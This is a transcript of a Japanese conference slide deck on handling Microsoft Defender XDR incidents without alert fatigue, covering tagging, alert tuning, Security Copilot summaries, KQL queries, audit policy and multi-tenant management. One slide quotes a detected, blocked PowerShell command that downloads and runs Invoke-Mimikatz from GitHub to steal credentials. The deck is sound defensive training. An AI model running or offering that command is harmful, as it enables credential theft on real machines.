Microsoft Defender XDRで疲弊しないためのインシデント対応

Transcript

1. Microsoft Defender XDRで疲弊しないための インシデント対応

2. 2 自己紹介 • 国井 傑 (くにい すぐる) • 株式会社エストディアン 所属

   • 公立大学法人会津大学 客員教授 • マイクロソフト認定トレーナー (1997～2025) • Microsoft MVP for Security (2006～2025) • ブログ https://AzureAD.net • 主な職務・実績 • Microsoft 365 セキュリティ/インフラ管理に関わる トレーニング • テクニカル ライター • ひと目でわかる Microsoft Defender for Endpoint • 最短突破 Microsoft Azure セキュリティテクノロジ合格教本 • ひと目でわかる Microsoft Intune など

3. Microsoft Defender XDR インシデントとアラートの特徴

4. 4 アラートは大量に出力される仕組み シグナル Microsoft Defender for Office 365 Microsoft Defender

   for Identity Microsoft Defender for Endpoint Microsoft Defender for Cloud Apps Microsoft Entra Identity Protection Microsoft Defender for Cloud Exchange Online Protection Azure テナントなど オンプレミス デバイス メール ユーザー サインイン クラウドアプリ ADFS ADDS ADCS Microsoft Entra テナント インシデント アラート アラート アラート アラート アラート

5. 5 インシデント対応だけが仕事のすべてではない Secure Future Initiative ID デバイス アプリ ネットワーク/ インフラ

   データ AI Secure by Design Secure by Default Secure Operation サイバー ハイジーン インシデント対応 資産 脅威/脆弱性 Exposure Management (露出管理) Entra ID / MDI Vulnerability Management (脆弱性管理) ASPM/SSPM (Microsoft Defender for Cloud Apps) CSPM (Microsoft Defender for Cloud) 秘密度ラベル AI 用 DSPM Security Copilot Microsoft Defender XDR & Microsoft Sentinel Purview アラート / eDiscovery ワークロード保護 (Microsoft Defender for Cloud) ASPM: Application Security Posture Management SSPM: SaaS Security Posture Management CSPM: Cloud Security Posture Management DSPM: Data Security Posture Management

6. 疲弊しないためのポイント1 ～ タグ付けして優先順位を設定

7. 7 タグ付けして優先順位をつける インシデント対応ではトリアージのフェーズにおいて優先順位づけを します。この作業をある程度、機械的にできるような材料が必要です デバイスの 重要度 インシデントの重大度 低 低 低

   低 中 中 低 中 高 ※高中低のレベル分けはイメージです

8. 8 デバイスの重要度を定義 デバイスの値 組織における資産価値を表すもので、 脆弱性管理や露出スコアに影響する MDE デバイスには 2 つの重要度を設定できるタグがあります アラートに関連する重要度には

   [重要度] を利用してください 重要度 アラートや脅威の深刻度を表示するもので、 インシデント内のタグ付けに影響する

9. 疲弊しないためのポイント2 ～ アラートを出力する余計な設定は削除・無効化する

10. 10 冗長なアラートが出力される場所 シグナル Microsoft Defender for Office 365 Microsoft Defender

    for Identity Microsoft Defender for Endpoint Microsoft Defender for Cloud Apps Microsoft Entra Identity Protection Microsoft Defender for Cloud Exchange Online Protection Azure テナントなど オンプレミス デバイス メール ユーザー サインイン クラウドアプリ ADFS ADDS ADCS Microsoft Entra テナント インシデント アラート アラート アラート アラート アラート

11. 11 アラート チューニングの活用 アラート チューニングはアラートの出力を抑制するためのルールで Microsoft Defender ポータルの 設定 >

    Microsoft Defender XDR > アラート チューニング から設定します [指標] で指定した URL へのアクセスがあった時のアラートを非表示にする設定

12. 疲弊しないためのポイント3 ～ インシデント対応は完了したら必ず Resolved にする

13. 13 インシデントが全部まとめられてしまう インシデント対応は単位時間内に複数のものが出力されると ひとつのインシデントに統合されてしまいます

14. 14 インシデントの管理メニューから Resolved にする • [インシデントの管理] メニューは 単なるチケット管理機能ではない • インシデント対応が完了したインシデントは

    状態を [Resolved] に設定して 他のアラート等と紐づかないようにする • Resolved にしたインシデントは インシデント画面で非表示にできる • インシデント全体を [Resolved] にできない 場合でもアラート単位で [Resolved] に しておくと余計な紐づけは防げる

15. 疲弊しないためのポイント4 ～ Security Copilot の活用

16. 16 Security Copilot の構成 Security Copilot Microsoft Defender TI /

    EASM Microsoft Sentinel urlscan Microsoft Entra ID Microsoft Intune Microsoft Defender XDR Microsoft Purview プロンプトブック 会社のインシデント 対応フローを実装 調査対象 不要なゲストユーザーを 見極める エラーコードの検索 インシデントの概要 特定エンティティの調査 レポート作成 過去ログの参照 脅威情報の参照 秘密度ラベルの設定変更 DLP のアラートを繰り返し 行うユーザーの追跡 ファイル プロンプトで利用する データをあらかじめ登録

17. 17 インシデント レポートから概要を把握 重要度の高いインシデント「1つのエンドポイント上のMimikatz認証 情報盗難ツール」は、2024-06-10 10:18:07 UTC ～ 2024-06-10 10:18:18

    UTCの間に発生しました。 クレデンシャルアクセス：2024-06-10 10:18:07 UTCにおいて、 Mimikatz認証情報盗難ツールがデバイス「xxxxx」（Windows 10）上で検出され、ユーザー「SuguruKUNII」に影響を与えました。 このツールはプロセス「cmd.exe」に関連していた。 その直後、同時に「xxxxx」上のDefenderが、コマンドライン 「C:¥Windows¥System32¥WindowsPowerShell¥v1.0」内の 「HackTool:PowerShell/Mimikatz.B」の実行を阻止した。exe powershell -c IEX(New-Object System.Net.WebClient).DownloadString(¥u0027hxxps://raw .githubusercontent.com/g4uss47/Invoke- Mimikatz/master/Invoke-Mimikatz.ps1u0027);Invoke- Mimikatz'.この操作により、「SuguruKUNII」からの認証情報の盗 難の可能性がなくなった。

18. 18 インシデントにアクセスすると自動的に概要情報を要約

19. 19 ガイド付き応答による能動的なインシデント対応

20. 20 ガイド付き応答による能動的なインシデント対応

21. 疲弊しないためのポイント5 ～ アラートを統計情報として扱う

22. 22 アラートや脆弱性情報を個別に参照せず、統計情報として扱う

23. 23 【参考】重大度別 脆弱性情報の統計を表示するクエリ DeviceTvmSoftwareVulnerabilities | extend SeverityOrder = case( VulnerabilitySeverityLevel

    == "Critical", 1, VulnerabilitySeverityLevel == "High", 2, VulnerabilitySeverityLevel == "Medium", 3, VulnerabilitySeverityLevel == "Low", 4, 5 ) | summarize count() by VulnerabilitySeverityLevel, SeverityOrder | order by SeverityOrder asc | project VulnerabilitySeverityLevel, count_ | render columnchart

24. 24 クエリを保存して、簡易的なダッシュボードとして活用

25. 疲弊しないためのポイント6 ～ ログ出力の抑制

26. 26 MDE で収集されるイベントとそのテーブル テーブル名 保存内容 特徴 DeviceInfo マシン情報 (OS 情報を含む)

    15 分ごとにユーザー/デバイス情報等を収集 DeviceNetworkInfo マシンのネットワーク プロパティ デバイスの IP アドレスや MAC アドレス等の情報を収集 DeviceProcessEvents プロセスの作成と関連イベント プロセスの作成とその親プロセス等の情報を収集 DeviceNetworkEvents ネットワーク接続と関連イベント ネットワーク通信の履歴を収集 DeviceFileEvents ファイルの作成、変更、その他のファ イル システムイベント ファイルの作成、変更、削除のイベントを収集 DeviceRegistryEvents レジストリ エントリの作成と変更 レジストリの作成、変更、削除のイベントを収集 DeviceLogonEvents サインインとその他の認証イベント デバイス上で行われたサインインのイベントを収集 DeviceImageLoadEvents DLL 読み込みイベント DeviceEvents 追加のイベントの種類 ウイルス対策などのセキュリティイベントを記録 DeviceFileCertificateInfo 署名されたファイルの証明書情報 ファイル署名証明書に関する情報を収集 MDE で収集されるイベントの一部は Windows イベントログを流用しています

27. 27 Auditpol コマンド • 設定一覧の確認 • auditpol /get /category:* •

    特定の設定変更 • auditpol /set /subcategory:"ログオン" /success:enable /failure:enable • ポリシー設定のバックアップ • auditpol/backup /file:ファイルのパス • ポリシー設定のリストア • auditpol/restore /file:ファイルのパス Auditpol コマンドはセキュリティログのイベントとして収集する内容を カスタマイズするために使用します

28. 28 MDE オンボードによって設定変更する監査カテゴリ イベント ID MDE での名称 監査カテゴリ 監査サブカテゴリ 推奨値

    既定値 4670 Taking Ownership on File from TrustedInstaller ポリシーの変更 ポリシーの変更の承認 1 0 4670 Taking Ownership on MDE Key ポリシーの変更 ポリシーの変更の承認 1 0 4664 Hardlink Create Audit Event オブジェクト アクセス ファイル システム 1 0 4697 A service was installed システム セキュリティ システムの拡張 1 0 4698 A scheduled task was created オブジェクト アクセス その他のオブジェクト アクセス イベント 1 0 4699 A scheduled task was deleted オブジェクト アクセス その他のオブジェクト アクセス イベント 1 0 4702 A scheduled task was updated オブジェクト アクセス その他のオブジェクト アクセス イベント 1 0 6416 Plug and Play event 詳細追跡 プラグ アンド プレイ イベント 1 0 各監査項目の値は次の通りです 0=監査なし, 1=成功を監査, 2=失敗を監査, 3=成功・失敗を監査

29. 29 MDE オンボードによって設定変更する監査カテゴリ (続き) イベント ID MDE での名称 監査カテゴリ 監査サブカテゴリ

    推奨値 既定値 5031 Firewall app blocked from listening オブジェクト アクセス フィルタリング プラットフォーム の接続 2 0 5157 Firewall has blocked a connection outbound オブジェクト アクセス フィルタリング プラットフォーム の接続 2 0 5157 Firewall has blocked a connection inbound オブジェクト アクセス フィルタリング プラットフォーム の接続 2 0 5379 Credman - Read Credentials ログオン/ログオフ その他のログオン/ログオフ イベ ント 2 0 5380 Vault Credential - Find Credential ログオン/ログオフ その他のログオン/ログオフ イベ ント 2 0 5381 Vault Credential - Enumerate Credentials ログオン/ログオフ その他のログオン/ログオフ イベ ント 2 0 5382 Vault Credential - Get Unique Credential ログオン/ログオフ その他のログオン/ログオフ イベ ント 2 0 4724 An Attempt was made to reset an account password アカウント管理 ユーザー アカウント管理 3 1 6423 Forbidden installation (PNP Audit) 詳細追跡 プラグ アンド プレイ イベント 1 0

30. 疲弊しないためのポイント7 ～ 複数テナントの統合管理

31. 31 XDR & Sentinel 統合管理 Microsoft Sentinel ワークスペース A セキュリティ管理者

    Defender XDR Microsoft Sentinel ワークスペース B テナント

32. 32 XDR 統合管理 (マルチテナント管理) セキュリティ管理者 Defender XDR テナント A Defender

    XDR テナント B ゲストユーザーを透過的に利用

33. 33 XDR 統合管理 (UI) ホームテナント https://security.microsoft.com/?tid=xxxx 別テナント https://security.microsoft.com/?tid=xxxx マルチテナント一括設定用 UI

    https://mto.security.microsoft.com/

34. まとめ

35. 35 まとめ 1 | タグ付けして優先順位を設定 2 | アラートを出力する余計な 設定は削除・無効化する 5

    | アラートを統計情報として扱う 6 | ログ出力の抑制 3 | インシデント対応は完了したら 必ず Resolved にする 4 | Security Copilot の活用 7 | 複数テナントの統合管理

36. Appendix

37. 37 【参考】監査カテゴリと MDE のイベント イベント ID MDE での名称 監査カテゴリ 監査サブカテゴリ

    5058 Persistent cryptographic key operation. システム その他のシステム イベント 5059 Persistent cryptographic key export. システム その他のシステム イベント 4670 Taking Ownership on File from TrustedInstaller ポリシーの変更 ポリシーの変更の承認 4670 Taking Ownership on MDE Key ポリシーの変更 ポリシーの変更の承認 4664 Hardlink Create Audit Event オブジェクト アクセス ファイル システム 4907 Sense tampering through object sacl change ポリシーの変更 ポリシーの変更の監査 4697 A service was installed システム セキュリティ システムの拡張 4624 Logon event ログオン/ログオフ ログオン 4625 An account failed to log on ログオン/ログオフ ログオン 4698 A scheduled task was created オブジェクト アクセス その他のオブジェクト アクセス イベント 4699 A scheduled task was deleted オブジェクト アクセス その他のオブジェクト アクセス イベント 4702 A scheduled task was updated オブジェクト アクセス その他のオブジェクト アクセス イベント

38. 38 【参考】監査カテゴリと MDE のイベント (続き) イベント ID MDE での名称 監査カテゴリ

    監査サブカテゴリ 4720 A user account was created アカウント管理 ユーザー アカウント管理 6416 Plug and Play event 詳細追跡 プラグ アンド プレイ イベント 5024 Firewall service started システム その他のシステムイベント 5025 Firewall service stopped システム その他のシステムイベント 5031 Firewall app blocked from listening オブジェクト アクセス フィルタリング プラットフォームの接続 5157 Firewall has blocked a connection outbound オブジェクト アクセス フィルタリング プラットフォームの接続 5157 Firewall has blocked a connection inbound オブジェクト アクセス フィルタリング プラットフォームの接続 5376 Credman - Credentials Backup アカウント管理 ユーザー アカウント管理 5379 Credman - Read Credentials ログオン/ログオフ その他のログオン/ログオフ イベント 5380 Vault Credential - Find Credential ログオン/ログオフ その他のログオン/ログオフ イベント 5381 Vault Credential - Enumerate Credentials ログオン/ログオフ その他のログオン/ログオフ イベント 5382 Vault Credential - Get Unique Credential ログオン/ログオフ その他のログオン/ログオフ イベント 4648 Logon using explicit credentials ログオン/ログオフ ログオン

39. 39 【参考】監査カテゴリと MDE のイベント (続き) イベント ID MDE での名称 監査カテゴリ

    監査サブカテゴリ 4719 System Audit Policy was changed ポリシーの変更 ポリシーの変更の監査 4724 An Attempt was made to reset an account password アカウント管理 ユーザー アカウント管理 4726 A user account was deleted アカウント管理 ユーザー アカウント管理 4732 A member was added to a security-enabled local group アカウント管理 セキュリティ グループ管理 4731 Local group created アカウント管理 セキュリティ グループ管理 4726 A user account was deleted アカウント管理 ユーザー アカウント管理 4733 Local group removed アカウント管理 セキュリティ グループ管理 4734 Local group deleted アカウント管理 セキュリティ グループ管理 4738 A user account was changed アカウント管理 ユーザー アカウント管理 4732 A member was added to a security-enabled local group アカウント管理 セキュリティ グループ管理 6423 Forbidden installation (PNP Audit) 詳細追跡 プラグ アンド プレイ イベント

40. 40 【参考】監査カテゴリと MDE のイベント (続き) イベント ID MDE での名称 監査カテゴリ

    監査サブカテゴリ 4798 User’s local group membership was enumerated アカウント管理 ユーザー アカウント管理 4799 Security-enabled local group membership was enumerated アカウント管理 セキュリティ グループ管理